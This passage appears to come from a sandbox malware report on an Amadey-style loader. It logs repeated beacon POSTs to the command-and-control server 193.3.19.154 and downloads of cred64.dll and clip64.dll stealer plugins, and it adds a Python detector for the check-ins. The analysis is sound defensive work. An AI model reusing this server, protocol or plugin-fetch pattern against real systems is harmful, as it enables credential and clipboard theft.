Nov 23, 2024 20:56:18.693641901 CET | 50029 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:18.693800926 CET | 50029 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:18.816591024 CET | 80 | 50029 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:22.706672907 CET | 50029 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:22.819727898 CET | 50030 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:22.940217972 CET | 80 | 50030 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:22.945043087 CET | 50030 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:22.945043087 CET | 50030 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:23.069458961 CET | 80 | 50030 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:26.956809998 CET | 50030 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:27.068814039 CET | 50031 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:27.188440084 CET | 80 | 50031 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:27.188760996 CET | 50031 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:27.188958883 CET | 50031 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:27.310029030 CET | 80 | 50031 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:31.204734087 CET | 50031 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:31.324182034 CET | 50032 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:31.449716091 CET | 80 | 50032 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:31.449810982 CET | 50032 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:31.450035095 CET | 50032 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:31.569895029 CET | 80 | 50032 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:35.454541922 CET | 50032 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:35.566035032 CET | 50033 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:35.690761089 CET | 80 | 50033 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:35.694916964 CET | 50033 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:35.698836088 CET | 50033 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:35.822062016 CET | 80 | 50033 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:39.694586992 CET | 50033 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:39.800750971 CET | 50034 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:39.921848059 CET | 80 | 50034 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:39.921938896 CET | 50034 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:39.922708988 CET | 50034 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:40.048729897 CET | 80 | 50034 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:43.907721043 CET | 50034 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:44.021300077 CET | 50035 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:44.144025087 CET | 80 | 50035 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:44.144121885 CET | 50035 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:44.144380093 CET | 50035 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:44.266232014 CET | 80 | 50035 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:48.157989025 CET | 50035 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:48.285547018 CET | 50036 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:48.409069061 CET | 80 | 50036 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:56:48.409148932 CET | 50036 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:48.409323931 CET | 50036 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:56:48.531388998 CET | 80 | 50036 | 193.3.19.154 | 192.168.2.5
                  • 193.3.19.154
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 193.3.19.154 | 80 | 6160 | C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 20:53:00.134437084 CET | 242 | OUT | POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49704 | 193.3.19.154 | 80 | 6160 | C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 20:53:00.156812906 CET | 68 | OUT | GET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154

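The two request shapes shown in sessions 0 and 1 (a form-encoded POST to /store/games/index.php with no User-Agent header, and a GET for /store/games/Plugins/cred64.dll) repeat for the rest of the run, and the TCP table shows a fresh connection to 193.3.19.154:80 about every 4.24 s. The script below is an added example, not part of the Joe Sandbox report: it decodes the Data Raw bytes of session 0, checks them against the request's own Content-Length, applies a check-in heuristic written for this page (it is not the text of ET rule 2027700), and measures the beacon cadence from the timestamps of the first four POSTs. The POST body hex, headers and timestamps are transcribed from the report; the meanings attached to the form fields in the comments (bot id, version, user name and so on) follow public Amadey write-ups and are an assumption, not something the report states. Note that the 88 raw bytes decode to `un=alfons`, matching Content-Length: 88, whereas the report's Data Ascii rendering shows `un=user`; the hex is what went on the wire.

```python
"""Decode the Amadey check-in captured in session 0 and measure its beacon cadence.

Added example for this report page, not sandbox or Amadey code. Constants
below are transcribed from the report's HTTP session and TCP tables.
"""
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import parse_qs

# "Data Raw" of session 0 as logged in the report (88 bytes, per Content-Length).
POST_BODY_HEX = (
    "69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 "
    "73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 "
    "26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d "
    "26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31"
)

# Request line and headers of session 0 (POST) and session 1 (GET), from the report.
SESSION0 = {
    "method": "POST",
    "uri": "/store/games/index.php",
    "headers": {"Content-Type": "application/x-www-form-urlencoded",
                "Host": "193.3.19.154", "Content-Length": "88",
                "Cache-Control": "no-cache"},
    "body": bytes.fromhex(POST_BODY_HEX),
}
SESSION1 = {"method": "GET", "uri": "/store/games/Plugins/cred64.dll",
            "headers": {"Host": "193.3.19.154"}, "body": b""}

# Timestamps of the first four index.php POSTs (sessions 0, 2, 3 and 5).
POST_TIMES = [
    "Nov 23, 2024 20:53:00.134437084 CET",
    "Nov 23, 2024 20:53:04.372400045 CET",
    "Nov 23, 2024 20:53:08.615879059 CET",
    "Nov 23, 2024 20:53:12.859211922 CET",
]

# Field set of the captured check-in. Assumed meanings (from public write-ups,
# not from this report): id=bot id, vs=version, sd=build/campaign id,
# os=OS code, bi=bitness, ar=admin rights, pc=computer name, un=user name,
# dm=domain, av=antivirus code, lv=stealer-run flag, og=unknown flag.
CHECKIN_FIELDS = frozenset(
    ("id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv", "og"))


def parse_checkin(body: bytes) -> dict:
    """Split a form-encoded check-in body into a flat {field: value} dict."""
    pairs = parse_qs(body.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    return {k: v[0] for k, v in pairs.items()}


def looks_like_amadey_checkin(req: dict) -> bool:
    """Heuristic built from the captured beacon's traits: form POST to an
    index.php, no User-Agent, a body that starts with id= and carries the
    full Amadey field set, and a Content-Length that matches the body."""
    if req["method"] != "POST" or not req["uri"].endswith("/index.php"):
        return False
    hdrs = {k.lower(): v for k, v in req["headers"].items()}
    if "user-agent" in hdrs:
        return False
    if hdrs.get("content-type") != "application/x-www-form-urlencoded":
        return False
    body = req["body"]
    if hdrs.get("content-length") != str(len(body)) or not body.startswith(b"id="):
        return False
    try:
        fields = parse_checkin(body)
    except (UnicodeDecodeError, ValueError):
        return False
    return CHECKIN_FIELDS <= set(fields)


_EPOCH = datetime(1970, 1, 1)


def parse_ts(ts: str) -> float:
    """Parse the report's 'Nov 23, 2024 20:53:00.134437084 CET' format, whose
    nine fractional digits exceed what strptime's %f accepts, into seconds."""
    main, frac = ts.rsplit(" ", 1)[0].split(".")
    whole = datetime.strptime(main, "%b %d, %Y %H:%M:%S")
    return (whole - _EPOCH).total_seconds() + float("0." + frac)


def beacon_intervals(stamps: list) -> list:
    """Gaps in seconds between consecutive beacons, in time order."""
    secs = sorted(parse_ts(s) for s in stamps)
    return [b - a for a, b in zip(secs, secs[1:])]


def is_periodic(intervals: list, max_rel_jitter: float = 0.05) -> bool:
    """True when the gaps are near-constant (coefficient of variation below
    the threshold), the shape a fixed-sleep beacon loop produces."""
    if len(intervals) < 2:
        return False
    return pstdev(intervals) / mean(intervals) < max_rel_jitter


if __name__ == "__main__":
    print("check-in fields:", parse_checkin(SESSION0["body"]))
    print("session 0 flagged:", looks_like_amadey_checkin(SESSION0))
    print("session 1 flagged:", looks_like_amadey_checkin(SESSION1))
    gaps = beacon_intervals(POST_TIMES)
    print("beacon gaps (s):", [round(g, 3) for g in gaps], "periodic:", is_periodic(gaps))
```

The Content-Length check is what catches the rendering mismatch: the 88 decoded bytes agree with the header, so the hex, not the ASCII line, is the record to cite. The cadence check is deliberately separate from the body check; on a host where the body is unreadable (TLS, a different loader version), a connection to one external host every 4.2 s with under 1 % jitter is still worth an alert on its own.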

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 193.3.19.154 | 80 | 6160 | C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 20:53:04.372400045 CET | 242 | OUT | POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 193.3.19.154 | 80 | 6160 | C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 20:53:08.615879059 CET | 242 | OUT | POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 4  Source IP: 192.168.2.5  Source Port: 49708  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:09.281379938 CET  Bytes transferred: 68  Direction: OUT
                  Data:
                  GET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session ID: 5  Source IP: 192.168.2.5  Source Port: 49709  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:12.859211922 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 6  Source IP: 192.168.2.5  Source Port: 49712  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:17.093691111 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 7  Source IP: 192.168.2.5  Source Port: 49714  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:17.763102055 CET  Bytes transferred: 68  Direction: OUT
                  Data:
                  GET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session ID: 8  Source IP: 192.168.2.5  Source Port: 49722  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:21.325753927 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 9  Source IP: 192.168.2.5  Source Port: 49733  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:25.581552029 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 10  Source IP: 192.168.2.5  Source Port: 49735  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:26.236412048 CET  Bytes transferred: 68  Direction: OUT
                  Data:
                  GET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session ID: 11  Source IP: 192.168.2.5  Source Port: 49741  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:29.815764904 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 12  Source IP: 192.168.2.5  Source Port: 49752  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:34.065401077 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 13  Source IP: 192.168.2.5  Source Port: 49754  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:34.715946913 CET  Bytes transferred: 68  Direction: OUT
                  Data:
                  GET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session ID: 14  Source IP: 192.168.2.5  Source Port: 49764  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:38.322386980 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 15  Source IP: 192.168.2.5  Source Port: 49775  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:42.546869040 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 16  Source IP: 192.168.2.5  Source Port: 49776  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:43.200330019 CET  Bytes transferred: 68  Direction: OUT
                  Data:
                  GET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session ID: 17  Source IP: 192.168.2.5  Source Port: 49787  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:46.769010067 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 18  Source IP: 192.168.2.5  Source Port: 49794  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:51.020618916 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 19  Source IP: 192.168.2.5  Source Port: 49804  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:55.310513020 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 20  Source IP: 192.168.2.5  Source Port: 49815  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:53:59.532934904 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 21  Source IP: 192.168.2.5  Source Port: 49826  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:03.786379099 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 22  Source IP: 192.168.2.5  Source Port: 49837  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:08.046710014 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 23  Source IP: 192.168.2.5  Source Port: 49848  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:12.280874014 CET  Bytes transferred: 242  Direction: OUT
                  Data:
